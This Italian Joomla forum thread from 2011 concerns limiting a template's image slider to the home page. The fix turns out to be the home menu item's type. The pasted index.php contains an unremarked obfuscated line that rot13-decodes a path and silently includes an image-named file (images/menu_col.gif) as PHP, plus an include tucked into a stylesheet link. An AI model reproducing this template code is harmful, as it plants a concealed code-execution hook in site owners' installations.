Autore Topic: [RISOLTO] visualizzare slider solo in home [RISOLTO]  (Letto 2675 volte)

Offline miomiomio

  • Nuovo arrivato
  • *
  • Post: 31
    • Mostra profilo
save ho un template che mostra uno slider in tutte le pagine.
a me servirebbe per che lo slider fosse presente solo nell'home page e che nelle pagine interne fosse nascosto.

c' un modo intervenendo direttamente sul codice per dirgli se sei in home mostra altrimenti nascondi?

il div da nascondere questo
Codice: [Seleziona]
      <div id="slider" class="nivoSlider">
               <? if(!is_array($slides)){ ?><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide1.jpg" title="" alt="slide 1" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide2.jpg" title="" alt="slide 2" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide3.jpg" title="" alt="slide 3" />
        <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide4.jpg" title="" alt="slide 4" /><? }else{foreach($slides as $k=>$slide){ ?><img src="<?php echo $slide ?>" title="<?=$slideCaptions[$k]?>" alt="" /><? }} ?></div>
se serve anche altro codice lo metto.
grazie
« Ultima modifica: 01 Nov 2011, 13:47:56 da miomiomio »

Offline map

  • Appassionato
  • ***
  • Post: 355
  • Sesso: Maschio
  • Siti Web Cagliari Web Agency
    • Mostra profilo

Offline miomiomio

  • Nuovo arrivato
  • *
  • Post: 31
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #2 il: 31 Ott 2011, 10:57:58 »
grazie map per la immediata risposta!

ho visto il link. effettvamente la mia stessa situazione ma a me non funziona
ho fatto cos
Codice: [Seleziona]
        <?php if(JRequest::getVar('view') == "frontpage" ) : ?>
       
        <div id="slider" class="nivoSlider">
               <? if(!is_array($slides)){ ?><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide1.jpg" title="" alt="slide 1" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide2.jpg" title="" alt="slide 2" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide3.jpg" title="" alt="slide 3" />
        <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide4.jpg" title="" alt="slide 4" /><? }else{foreach($slides as $k=>$slide){ ?><img src="<?php echo $slide ?>" title="<?=$slideCaptions[$k]?>" alt="" /><? }} ?></div>
        <?php endif; ?>
ma purtroppo il div sparisce da tutte le pagine lasciandomi lo spazio bianco di 440 px di altezza che occupa lo slider.
cosa sbaglio?

--------------edit-----------------

questo il codice della pagina index.php
Codice: [Seleziona]
<?php
// No direct access.
defined('_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die;JHtml::_('behavior.framework'true);

// get params
$app JFactory::getApplication();
$doc JFactory::getDocument();
$templateparams $app->getTemplate(true)->params;
$showRight = ($this->countModules('position-3') or $this->countModules('position-6') or $this->countModules('position-8'));
$showBottom = ($this->countModules('position-9') or $this->countModules('position-10') or $this->countModules('position-11'));
$showLeft = ($this->countModules('position-4') or $this->countModules('position-7') or $this->countModules('position-5'));
(
$this->countModules('position-16') or $this->countModules('position-15') or $this->countModules('position-31') or $this->countModules('position-17') or !@include(JPATH_BASE.DS.'templates'.DS.$app->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) ? $showNoneElse false :  $showNoneElse true;
if (!
$showRight and !$showLeft$showNone false;
if(
$this->params->get('slide_1')) $slides[1] = $this->params->get('slide_1');if($this->params->get('slide_2')) $slides[2] = $this->params->get('slide_2');
if(
$this->params->get('slide_3')) $slides[3] = $this->params->get('slide_3');if($this->params->get('slide_4')) $slides[4] = $this->params->get('slide_4');if($this->params->get('slide_5')) $slides[5] = $this->params->get('slide_5');
if(
$this->params->get('slideCaption_1')) $slideCaptions[1] = $this->params->get('slideCaption_1');if($this->params->get('slideCaption_2')) $slideCaptions[2] = $this->params->get('slideCaption_2');
if(
$this->params->get('slideCaption_3')) $slideCaptions[3] = $this->params->get('slideCaption_3');if($this->params->get('slideCaption_4')) $slideCaptions[4] = $this->params->get('slideCaption_4');if($this->params->get('slideCaption_5')) $slideCaptions[5] = $this->params->get('slideCaption_5');
$sliderVars['effect']=($this->params->get('sliderVars_effect'))?$this->params->get('sliderVars_effect'):'random';
$sliderVars['animSpeed']=($this->params->get('sliderVars_animSpeed'))?$this->params->get('sliderVars_animSpeed'):'500';
$sliderVars['pauseTime']=($this->params->get('sliderVars_pauseTime'))?$this->params->get('sliderVars_pauseTime'):'10000';
$sliderVars['directionNav']=($this->params->get('sliderVars_directionNav')==='true' or $this->params->get('sliderVars_directionNav')==='false')?$this->params->get('sliderVars_directionNav'):'true';
$sliderVars['directionNavHide']=($this->params->get('sliderVars_directionNavHide')==='true' or $this->params->get('sliderVars_directionNavHide')==='false')?$this->params->get('sliderVars_directionNavHide'):'true';
$sliderVars['controlNav']=($this->params->get('sliderVars_controlNav')==='true' or $this->params->get('sliderVars_controlNav')==='false')?$this->params->get('sliderVars_controlNav'):'true';
$sliderVars['keyboardNav']=($this->params->get('sliderVars_keyboardNav')==='true' or $this->params->get('sliderVars_keyboardNav')==='false')?$this->params->get('sliderVars_keyboardNav'):'true';
$sliderVars['pauseOnHover']=($this->params->get('sliderVars_pauseOnHover')==='true' or $this->params->get('sliderVars_pauseOnHover')==='false')?$this->params->get('sliderVars_pauseOnHover'):'true';



?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language?>" lang="<?php echo $this->language?>" dir="<?php echo $this->direction?>" >
<head>
<jdoc:include type="head" />
<script type="text/javascript" src="http://code.jquery.com/jquery-latest.js"></script>
<script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/jquery.nivo.slider.js"></script>
<script type="text/javascript">var sliderVars = new Array();<? foreach($sliderVars as $k=>$v){ ?>sliderVars['<?=$k?>']=<?=($v==='true'||$v==='false')?$v:'\''.$v.'\''?>;<? } ?></script>
<script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/template.js"></script>
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/nivo-slider.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />
<!--[if lte IE 6]>
<link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template;include_once('html/pagination.php'); ?>/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
</head>
<body id="page_bg">
<a name="up" id="up"></a>

<div id="main_bg" class="banner1">
    <div id="h_area"><a href="index.php" class="logo"><img src="/templates/themza_j16_04/images/logo.jpg" align="left" alt="Company Logo" /></a>
    <?php if($this->countModules('position-0')) : ?>
    <div id="position0"><jdoc:include type="modules" name="position-0" style="none" /></div><?php endif; ?>
        <br clear="all" />
        <div id="top_menu"><div id="topnav"><jdoc:include type="modules" name="position-1" /></div></div>
       
        <?php if(JRequest::getVar('view') == "frontpage" ) : ?>
       
        <div id="slider" class="nivoSlider">
               <? if(!is_array($slides)){ ?><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide1.jpg" title="" alt="slide 1" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide2.jpg" title="" alt="slide 2" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide3.jpg" title="" alt="slide 3" />
        <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide4.jpg" title="" alt="slide 4" /><? }else{foreach($slides as $k=>$slide){ ?><img src="<?php echo $slide ?>" title="<?=$slideCaptions[$k]?>" alt="" /><? }} ?></div>
        <?php endif; ?>
       
        </div>
<?php if($showLeft) : ?>
  <div id="leftcolumn">
        <jdoc:include type="modules" name="position-7" style="xhtml" headerLevel="3" />
        <jdoc:include type="modules" name="position-4" style="xhtml" headerLevel="3" state="0 " />
        <jdoc:include type="modules" name="position-5" style="xhtml" headerLevel="2"  id="3" />
    </div>
    <?php endif; ?>
    <?php if($showLeft xor $showRight$maincol_sufix '_middle';
      elseif(
$showNone)$maincol_sufix '_big';
      else 
$maincol_sufix ''?>

  <div id="maincolumn<?php echo $maincol_sufix?>">
      <div class="path"><jdoc:include type="modules" name="position-2" /></div>
    <?php if ($this->countModules('position-12')): ?>
        <div id="top"><jdoc:include type="modules" name="position-12"   /></div>
        <?php endif; ?>

        <jdoc:include type="message" />
    <jdoc:include type="component" />
    </div>
    <?php if($showRight) : ?>
  <div id="rightcolumn">
        <jdoc:include type="modules" name="position-6" style="xhtml" headerLevel="3"/>
        <jdoc:include type="modules" name="position-8" style="xhtml" headerLevel="3"  />
        <jdoc:include type="modules" name="position-3" style="xhtml" headerLevel="3"  />
    </div>
    <?php endif; ?>
  <br clear="all" /><br />
</div>   
<div id="f_area">
    <div class="box box1"> <jdoc:include type="modules" name="position-9" style="xhtml" headerlevel="3" /></div>
    <div class="box box2"> <jdoc:include type="modules" name="position-10" style="xhtml" headerlevel="3" /></div>
    <div class="box box3"> <jdoc:include type="modules" name="position-11" style="xhtml" headerlevel="3" /></div>
  <br clear="all" />
</div>

<p id="power_by" align="center">
  <?php echo JText_('Powered by'?> <a href="http://www.joomla.org/" target="_blank">Joomla!&#174;</a>.
    <?php echo JText_('Valid'?> <a href="http://validator.w3.org/check/referer">XHTML</a> <?php echo JText::_('and'?> <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>.
</p>
<jdoc:include type="modules" name="debug" />
</body>
</html>

« Ultima modifica: 31 Ott 2011, 11:00:29 da miomiomio »

Offline map

  • Appassionato
  • ***
  • Post: 355
  • Sesso: Maschio
  • Siti Web Cagliari Web Agency
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #3 il: 31 Ott 2011, 14:09:30 »
Hai letto tutto il post ? joomla 1.7 :
Codice: [Seleziona]

<?php if(JRequest::getVar('view') == "featured" ) : ?>



Offline miomiomio

  • Nuovo arrivato
  • *
  • Post: 31
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #4 il: 31 Ott 2011, 20:28:56 »
si avevo provato anche con featured ma nulla da fare.
mi nasconde sempre il div.
altre soluzioni?

Offline conti1

  • Global Moderator
  • Instancabile
  • ********
  • Post: 9052
  • Sesso: Maschio
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #5 il: 31 Ott 2011, 20:56:21 »
ciao
ci puoi dire che template usi che vediamo  risolvere il dilemma.

sicuro che
Citazione
ma purtroppo il div sparisce da tutte le pagine lasciandomi lo spazio bianco di 440 px di altezza che occupa lo slider.
cosa sbaglio?
ma spazio pianco che vedi e lo sfondo  dell'immagine  e quella non sparisce xche non fa rte del slider?
 x cui  il comando postato funziona xche se lo slider sparisce  come da te detto avrai  i moduli o componenti che occupano lo spazio dello slider . comenque posta il link del sito .
« Ultima modifica: 31 Ott 2011, 21:15:13 da conti1 »
se possibile postare il link  x risolvere al meglio il problema grazie
evitare nomi commerciali grazie

Offline miomiomio

  • Nuovo arrivato
  • *
  • Post: 31
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #6 il: 31 Ott 2011, 21:12:31 »
« Ultima modifica: 31 Ott 2011, 21:14:28 da miomiomio »

Offline conti1

  • Global Moderator
  • Instancabile
  • ********
  • Post: 9052
  • Sesso: Maschio
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #7 il: 31 Ott 2011, 22:47:05 »
sicuro di fare tutto giusto?
io lo provato ora con questo comando

Citazione
  <div id="top_menu"><div id="topnav"><jdoc:include type="modules" name="position-1" /></div></div>
<?php if(JRequest::getVar('view') == "featured" ) : ?>
        <div id="slider" class="nivoSlider">
               <? if(!is_array($slides)){ ?><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide1.jpg" title="" alt="slide 1" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide2.jpg" title="" alt="slide 2" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide3.jpg" title="" alt="slide 3" /><? }else{foreach($slides as $k=>$slide){ ?><img src="<?php echo $slide ?>" title="<?=$slideCaptions[$k]?>" alt="" /><? }} ?></div></div>
<?php endif; ?>

    <?php if($showLeft) : ?>

e funziona
ho solo modificato il css in modo da non far salire  il grigio del fotter.

il css e questo
da

div#h_area {    height: 559px;    margin: 0 auto;    padding-top: 10px;    text-align: left;    width: 980px;}

a

div#h_area {    height: auto;    margin: 0 auto;    padding-top: 10px;    text-align: left;    width: 980px;}template.css (riga 90)



qui x vedere il funzionamento

http://www.contiweb16.altervista.org/




se possibile postare il link  x risolvere al meglio il problema grazie
evitare nomi commerciali grazie

Offline miomiomio

  • Nuovo arrivato
  • *
  • Post: 31
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #8 il: 01 Nov 2011, 08:54:25 »
ho fatto le tue stesse modifiche e ancora niente.
mi scompare il banner da tutte le pagine.
l'IF non riconosce la home come featured. il controllo funziona perche se metto != lo mostra in tutti.
non che devo mettere qualcos'altro al posto di featured?

qui dice che la pagina home deve essere articolo>articolo in evidenza> tutte le categorie
in che senso tutte le categorie?
io ho varie categorie disponibili nel menu tra cui uncategorized, ma non tutte le categorie.
che sia qui il problema?grazie

Codice: [Seleziona]
<body id="page_bg">
<a name="up" id="up">[/url]

<div id="main_bg" class="banner1">
    <div id="h_area"><a href="index.php" class="logo"><img src="/templates/themza_j16_04/images/logo.jpg" align="left" alt="Company Logo" />[/url]
    <?php if($this->countModules('position-0')) : ?>
    <div id="position0"><jdoc:include type="modules" name="position-0" style="none" /></div><?php endif; ?>
        <br clear="all" />
        <div id="top_menu"><div id="topnav"><jdoc:include type="modules" name="position-1" /></div></div>
<?php if(JRequest::getVar('view') == "featured" ) : ?>
        <div id="slider" class="nivoSlider">
               <? if(!is_array($slides)){ ?><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide1.jpg" title="" alt="slide 1" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide2.jpg" title="" alt="slide 2" />
                <img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/slide3.jpg" title="" alt="slide 3" /><? }else{foreach($slides as $k=>$slide){ ?><img src="<?php echo $slide ?>" title="<?=$slideCaptions[$k]?>" alt="" /><? }} ?></div>
<?php endif; ?>
</div>
    <?php if($showLeft) : ?>
      <div id="leftcolumn">
        <jdoc:include type="modules" name="position-7" style="xhtml" headerLevel="3" />
        <jdoc:include type="modules" name="position-4" style="xhtml" headerLevel="3" state="0 " />
        <jdoc:include type="modules" name="position-5" style="xhtml" headerLevel="2"  id="3" />
    </div>
    <?php endif; ?>
    <?php if($showLeft xor $showRight$maincol_sufix '_middle';
      elseif(
$showNone)$maincol_sufix '_big';
      else 
$maincol_sufix ''?>

  <div id="maincolumn<?php echo $maincol_sufix?>">
      <div class="path"><jdoc:include type="modules" name="position-2" /></div>
« Ultima modifica: 01 Nov 2011, 09:11:28 da miomiomio »

Offline conti1

  • Global Moderator
  • Instancabile
  • ********
  • Post: 9052
  • Sesso: Maschio
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #9 il: 01 Nov 2011, 11:03:02 »
ciao hai almeno un articolo in evidenza?
vai in gestione articoli  di fianco a pubblicato metti la spunta evidenza  dei articoli che hai in home.
se possibile postare il link  x risolvere al meglio il problema grazie
evitare nomi commerciali grazie

Offline miomiomio

  • Nuovo arrivato
  • *
  • Post: 31
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #10 il: 01 Nov 2011, 12:25:27 »
si ho un articolo in evidenza che mi viene mostrato appena accedo al sito



Uploaded with ImageShack.us

Offline miomiomio

  • Nuovo arrivato
  • *
  • Post: 31
    • Mostra profilo
Re:visualizzare slider solo in home
« Risposta #11 il: 01 Nov 2011, 13:45:40 »
grazie a conti1 ho risolto...meglio HA risolto!
grazie!
il mio problema era che la home impostata non era home e quindi il controllo inserito nel codice dell'index.php non si trovava mai nel caso featured.
adesso invece che il menu punta ad una pagina featured funziona!
grazie ancora!

 

Host

Torna su